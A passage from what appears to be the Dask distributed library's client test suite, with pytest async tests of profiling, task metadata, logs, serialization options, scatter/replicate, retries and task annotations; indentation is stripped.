x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack()
assert result
@pytest.mark.flaky(condition=WINDOWS, reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await wait(futures)
x = await c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = await c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = await c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = await c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
await wait(x + y)
xp = await c.profile("slowinc")
yp = await c.profile("slowdec")
p = await c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = await c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = await Client(s.address, asynchronous=True, name="foo")
assert "foo" in client.id
await client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
client = await Client(s.address, asynchronous=True)
future = Future(x.key, client)
while future.status != "finished":
await asyncio.sleep(0.01)
await client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = await future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
await c.set_metadata("x", 1)
result = await c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
await wait(future)
await c.set_metadata(key, 123)
result = await c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
await asyncio.sleep(0.01)
with pytest.raises(KeyError):
await c.get_metadata(key)
result = await c.get_metadata(key, None)
assert result is None
await c.set_metadata(["x", "a"], 1)
result = await c.get_metadata("x")
assert result == {"a": 1}
await c.set_metadata(["x", "b"], 2)
result = await c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = await c.get_metadata(["x", "a"])
assert result == 1
await c.set_metadata(["x", "a", "c", "d"], 1)
result = await c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
await wait(c.map(inc, range(5)))
logs = await c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = await c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = await c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = await future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = await Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text or "1.91 MiB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
assert len(record) < 2
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
func = _UnhashableCallable()
result = await c.submit(func, 1)
assert result == 2
@gen_cluster()
async def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = await Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
await c.close()
def test_client_doesnt_close_given_loop(loop_in_thread, s, a, b):
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
await c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
monkeypatch.setenv("USER", "myusername")
with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
link = "http://foo-myusername:12355/status"
assert link == c.dashboard_link
text = c._repr_html_()
assert link in text
@gen_test()
async def test_dashboard_link_inproc():
async with Client(processes=False, asynchronous=True, dashboard_address=":0") as c:
with dask.config.set({"distributed.dashboard.link": "{host}"}):
assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
stop = time()
assert c.status == "closed"
await c.close()
assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
import tornado.httpserver
import tornado.web
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
await c._close(fast=True)
http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
@gen_cluster(client=True, client_kwargs={"serializers": ["dask", "msgpack"]})
async def test_turn_off_pickle(c, s, a, b, direct):
np = pytest.importorskip("numpy")
assert (await c.submit(inc, 1)) == 2
await c.submit(np.ones, 5)
await c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
await c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
await wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
await c.gather(future, direct=direct)
# Run works
result = await c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = await c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
await c.run(lambda: inc)
with pytest.raises(TypeError):
await c.run_on_scheduler(lambda: inc)
@gen_cluster()
async def test_de_serialization(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=":0") as c:
pass
c._repr_html_()
@pytest.mark.xfail(reason="https://github.com/dask/dask/pull/6807")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
await wait([fx, fy])
assert (o[x.key] < o[y.key]) == (
s.tasks[stringify(fx.key)].priority < s.tasks[stringify(fy.key)].priority
)
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = await c.scatter(1)
y = c.submit(bad_fn, x)
del x
await wait(y)
assert y.status == "error"
await asyncio.sleep(0.1)
assert y.status == "error" # not cancelled
@pytest.mark.parametrize("workers_arg", [False, True])
@pytest.mark.parametrize("direct", [False, True])
@pytest.mark.parametrize("broadcast", [False, True, 10])
@gen_cluster(
client=True,
nthreads=[("", 1)] * 10,
worker_kwargs={"memory_monitor_interval": "20ms"},
)
async def test_scatter_and_replicate_avoid_paused_workers(
c, s, *workers, workers_arg, direct, broadcast
):
paused_workers = [w for i, w in enumerate(workers) if i not in (3, 7)]
for w in paused_workers:
w.memory_pause_fraction = 1e-15
while any(s.workers[w.address].status != Status.paused for w in paused_workers):
await asyncio.sleep(0.01)
f = await c.scatter(
{"x": 1},
workers=[w.address for w in workers[1:-1]] if workers_arg else None,
broadcast=broadcast,
direct=direct,
)
if not broadcast:
await c.replicate(f, n=10)
expect = [i in (3, 7) for i in range(10)]
actual = [("x" in w.data) for w in workers]
assert actual == expect
@pytest.mark.xfail(reason="GH#5409 Dask-Default-Threads are frequently detected")
def test_no_threads_lingering():
if threading.active_count() < 40:
return
active = dict(threading._active)
print(f"==== Found {len(active)} active threads: ====")
for t in active.values():
print(t)
assert False
@gen_cluster()
async def test_direct_async(s, a, b):
c = await Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
await c.close()
c = await Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
await c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
async def test_mixing_clients(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
assert not c2.futures # Don't create Futures on second Client
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (await future) == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
futures = await asyncio.gather(*(c.scatter(1, direct=True) for _ in range(5)))
x = await futures[0]
x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
await asyncio.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
await future
with dask.config.set(foo=True):
await future.retry()
await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
await y.retry()
await x.retry()
result = await y
assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
await c.gather(c.map(slowinc, range(10), delay=0.2))
state, figure = await c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
await c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = await future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = await c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = await c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
await asyncio.sleep(0.22) # 2 chances
assert not future.done()
w = await Worker(s.address)
start = time()
await future
assert time() < start + 1
await w.close()
with pytest.raises(TimeoutError) as info:
await c.wait_for_workers(n_workers=10, timeout="1 ms")
assert "2/10" in str(info.value).replace(" ", "")
assert "1 ms" in str(info.value)
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
before = proc.num_fds()
async with Scheduler(dashboard_address=":0") as s:
async with Worker(s.address), Worker(s.address), Client(
s.address, asynchronous=True
):
assert proc.num_fds() > before
await df.sum().persist()
start = time()
while proc.num_fds() > before:
await asyncio.sleep(0.01)
assert time() < start + 10, (before, proc.num_fds())
@gen_test()
async def test_dashboard_link_cluster():
class MyCluster(LocalCluster):
@property
def dashboard_link(self):
return "http://foo.com"
async with MyCluster(
processes=False, asynchronous=True, dashboard_address=":0"
) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert "http://foo.com" in client._repr_html_()
@gen_test()
async def test_shutdown():
async with Scheduler(dashboard_address=":0") as s:
async with Worker(s.address) as w:
async with Client(s.address, asynchronous=True) as c:
await c.shutdown()
assert s.status == Status.closed
assert w.status == Status.closed
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
async with LocalCluster(
n_workers=1, asynchronous=True, processes=False, dashboard_address=":0"
) as lc:
async with Client(lc, asynchronous=True) as c:
await c.shutdown()
assert lc.scheduler.status == Status.closed
@gen_test()
async def test_config_inherited_by_subprocess():
with dask.config.set(foo=100):
async with LocalCluster(
n_workers=1,
asynchronous=True,
processes=True,
dashboard_address=":0",
) as lc:
async with Client(lc, asynchronous=True) as c:
assert await c.submit(dask.config.get, "foo") == 100
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
pytest.importorskip("dask.dataframe")
df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
futures = futures_of(df)
for k, f in zip(df.__dask_keys__(), futures):
assert str(k) in str(f)
@pytest.mark.flaky(reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
for i in range(5):
try:
x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
await wait(x)
await asyncio.gather(
c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
)
p = await c.profile(server=True) # All worker servers
assert "slowinc" in str(p)
p = await c.profile(scheduler=True) # Scheduler
assert "slowdec" in str(p)
except AssertionError:
if i == 4:
raise
else:
pass
else:
break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
future = c.submit(inc, 1)
async def f(): # flake8: noqa
result = await future
assert result == 2
await f()
future = c.submit(div, 1, 0)
async def f():
with pytest.raises(ZeroDivisionError):
await future
await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures)
results = []
async def f():
async for future in ac:
result = await future
results.append(result)
await f()
assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures, with_results=True)
results = []
async def f():
async for future, result in ac:
results.append(result)
await f()
assert set(results) == set(range(1, 11))
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(sleep, 0.3)
ac = as_completed([x, y])
async def _():
await asyncio.sleep(0.1)
await y.cancel(asynchronous=True)
c.loop.add_callback(_)
L = []
async def f():
async for future in ac:
L.append(future)
await f()
assert L == [x, y]
@gen_test()
async def test_async_with():
async with Client(processes=False, dashboard_address=":0", asynchronous=True) as c:
assert await c.submit(lambda x: x + 1, 10) == 11
assert c.status == "closed"
assert c.cluster.status == Status.closed
def test_client_sync_with_async_def(loop):
async def ff():
await asyncio.sleep(0.01)
return 1
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert sync(loop, ff) == 1
assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
np = pytest.importorskip("numpy")
da = pytest.importorskip("dask.array")
x = np.random.random(1000000)
xr = weakref.ref(x)
d = da.from_array(x, chunks=(100000,))
d = d.persist()
del x
start = time()
while xr() is not None:
if time() > start + 5:
# Help diagnosing
from types import FrameType
x = xr()
if x is not None:
del x
rc = sys.getrefcount(xr())
refs = gc.get_referrers(xr())
print("refs to x:", rc, refs, gc.isenabled())
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("array should have been destroyed")
await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_on_scheduler_async_def(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_on_scheduler_async_def_wait(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f, wait=False)
while not hasattr(s, "foo"):
await asyncio.sleep(0.01)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f, wait=False)
while not hasattr(a, "foo") or not hasattr(b, "foo"):
await asyncio.sleep(0.01)
assert a.foo == "bar"
assert b.foo == "bar"
@pytest.mark.skipif(WINDOWS, reason="frequently kills off the whole test suite")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
pytest.importorskip("bokeh")
da = pytest.importorskip("dask.array")
async def f(stacklevel, mode=None):
"""
We wrap this in a function so that the assertions aren't in the
performanace report itself
Also, we want this comment to appear
"""
x = da.random.random((1000, 1000), chunks=(100, 100))
with tmpfile(extension="html") as fn:
async with performance_report(
filename=fn, stacklevel=stacklevel, mode=mode
):
await c.compute((x + x.T).sum())
with open(fn) as f:
data = f.read()
return data
# Ensure default kwarg maintains backward compatability
data = await f(stacklevel=1)
assert "Also, we want this comment to appear" in data
assert "bokeh" in data
assert "random" in data
assert "Dask Performance Report" in data
assert "x = da.random" in data
assert "Threads: 4" in data
assert "No logs to report" in data
assert dask.__version__ in data
# stacklevel=2 captures code two frames back -- which in this case
# is the testing function
data = await f(stacklevel=2)
assert "async def test_performance_report(c, s, a, b):" in data
assert "Dask Performance Report" in data
# stacklevel=0 or lower is overridden to stacklevel=1 so we don't see
# distributed internals
data = await f(stacklevel=0)
assert "Also, we want this comment to appear" in data
assert "Dask Performance Report" in data
data = await f(stacklevel=1, mode="inline")
assert "cdn.bokeh.org" not in data
data = await f(stacklevel=1, mode="cdn")
assert "cdn.bokeh.org" in data
@gen_cluster(nthreads=[])
async def test_client_gather_semaphore_loop(s):
async with Client(s.address, asynchronous=True) as c:
assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
seq = c.map(inc, range(5))
ac = as_completed(seq)
assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
with Client(s["address"]) as c:
assert c.rpc.semaphore._loop is c.loop.asyncio_loop
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=60)
async def test_mixed_compression(s):
pytest.importorskip("lz4")
da = pytest.importorskip("dask.array")
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": None}
):
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": "lz4"}
):
async with Client(s.address, asynchronous=True) as c:
await c.get_versions()
x = da.ones((10000, 10000))
y = x + x.T
await c.compute(y.sum())
@gen_cluster(client=True)
async def test_futures_in_subgraphs(c, s, a, b):
"""Regression test of <https://github.com/dask/distributed/issues/4145>"""
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
ddf = dd.from_pandas(
pd.DataFrame(
dict(
uid=range(50),
enter_time=pd.date_range(
start="2020-01-01", end="2020-09-01", periods=50, tz="UTC"
),
)
),
npartitions=5,
)
ddf = ddf[ddf.uid.isin(range(29))].persist()
ddf["local_time"] = ddf.enter_time.dt.tz_convert("US/Central")
ddf["day"] = ddf.enter_time.dt.day_name()
ddf = await c.submit(dd.categorical.categorize, ddf, columns=["day"], index=False)
@gen_cluster(client=True)
async def test_get_task_metadata(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
async with get_task_metadata() as tasks:
f = c.submit(slowinc, 1)
await f
metadata = tasks.metadata
assert f.key in metadata
assert metadata[f.key] == s.tasks.get(f.key).metadata
state = tasks.state
assert f.key in state
assert state[f.key] == "memory"
assert not any(isinstance(p, CollectTaskMetaDataPlugin) for p in s.plugins)
@gen_cluster(client=True)
async def test_get_task_metadata_multiple(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
# Ensure that get_task_metadata only collects metadata for
# tasks which are submitted and completed within its context
async with get_task_metadata() as tasks1:
f1 = c.submit(slowinc, 1)
await f1
async with get_task_metadata() as tasks2:
f2 = c.submit(slowinc, 2)
await f2
metadata1 = tasks1.metadata
metadata2 = tasks2.metadata
assert len(metadata1) == 2
assert sorted(metadata1.keys()) == sorted([f1.key, f2.key])
assert metadata1[f1.key] == s.tasks.get(f1.key).metadata
assert metadata1[f2.key] == s.tasks.get(f2.key).metadata
assert len(metadata2) == 1
assert list(metadata2.keys()) == [f2.key]
assert metadata2[f2.key] == s.tasks.get(f2.key).metadata
@gen_cluster(client=True)
async def test_register_worker_plugin_exception(c, s, a, b):
class MyPlugin:
def setup(self, worker=None):
raise ValueError("Setup failed")
with pytest.raises(ValueError, match="Setup failed"):
await c.register_worker_plugin(MyPlugin())
@gen_cluster(client=True)
async def test_log_event(c, s, a, b):
# Log an event from inside a task
def foo():
get_worker().log_event("topic1", {"foo": "bar"})
assert not await c.get_events("topic1")
await c.submit(foo)
events = await c.get_events("topic1")
assert len(events) == 1
assert events[0][1] == {"foo": "bar"}
# Log an event while on the scheduler
def log_scheduler(dask_scheduler):
dask_scheduler.log_event("topic2", {"woo": "hoo"})
await c.run_on_scheduler(log_scheduler)
events = await c.get_events("topic2")
assert len(events) == 1
assert events[0][1] == {"woo": "hoo"}
# Log an event from the client process
await c.log_event("topic2", ("alice", "bob"))
events = await c.get_events("topic2")
assert len(events) == 2
assert events[1][1] == ("alice", "bob")
@gen_cluster(client=True)
async def test_annotations_task_state(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(qux="bar", priority=100):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(
{"qux": "bar", "priority": 100} == ts.annotations for ts in s.tasks.values()
)
@pytest.mark.parametrize("fn", ["compute", "persist"])
@gen_cluster(client=True)
async def test_annotations_compute_time(c, s, a, b, fn):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
with dask.annotate(foo="bar"):
# Turn off optimization to avoid rewriting layers and picking up annotations
# that way. Instead, we want `compute`/`persist` to be able to pick them up.
fut = getattr(c, fn)(x, optimize_graph=False)
await wait(fut)
assert s.tasks
assert all(ts.annotations == {"foo": "bar"} for ts in s.tasks.values())
@pytest.mark.xfail(reason="https://github.com/dask/dask/issues/7036")
@gen_cluster(client=True)
async def test_annotations_survive_optimization(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(foo="bar"):
x = da.ones(10, chunks=(5,))
ann = x.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
(xx,) = dask.optimize(x)
ann = xx.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
@gen_cluster(client=True)
async def test_annotations_priorities(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(priority=15):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all("15" in str(ts.priority) for ts in s.tasks.values())
assert all(ts.priority[0] == -15 for ts in s.tasks.values())
assert all({"priority": 15} == ts.annotations for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_workers(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(workers=[a.address]):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all({"workers": (a.address,)} == ts.annotations for ts in s.tasks.values())
assert all({a.address} == ts.worker_restrictions for ts in s.tasks.values())
assert a.data
assert not b.data
@gen_cluster(client=True)
async def test_annotations_retries(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(retries=2):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(ts.retries == 2 for ts in s.tasks.values())
assert all(ts.annotations == {"retries": 2} for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_blockwise_unpack(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
from dask.array.utils import assert_eq
# A flaky doubling function -- need extra args because it is called before
# application to establish dtype/meta.
scale = varying([ZeroDivisionError("one"), ZeroDivisionError("two"), 2, 2])
def flaky_double(x):
return scale() * x
# A reliable double function.
def reliable_double(x):
return 2 * x
x = da.ones(10, chunks=(5,))
# The later annotations should not override the earlier annotations
with dask.annotate(retries=2):
y = x.map_blocks(flaky_double, meta=np.array((), dtype=float))
with dask.annotate(retries=0):
z = y.map_blocks(reliable_double, meta=np.array((), dtype=float))
with dask.config.set(optimization__fuse__active=False):
z = await c.compute(z)
assert_eq(z, np.ones(10) * 4.0)
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(resources={"GPU": 1}):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all([{"GPU": 1} == ts.resource_restrictions for ts in s.tasks.values()])
assert all([{"resources": {"GPU": 1}} == ts.annotations for ts in s.tasks.values()])
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
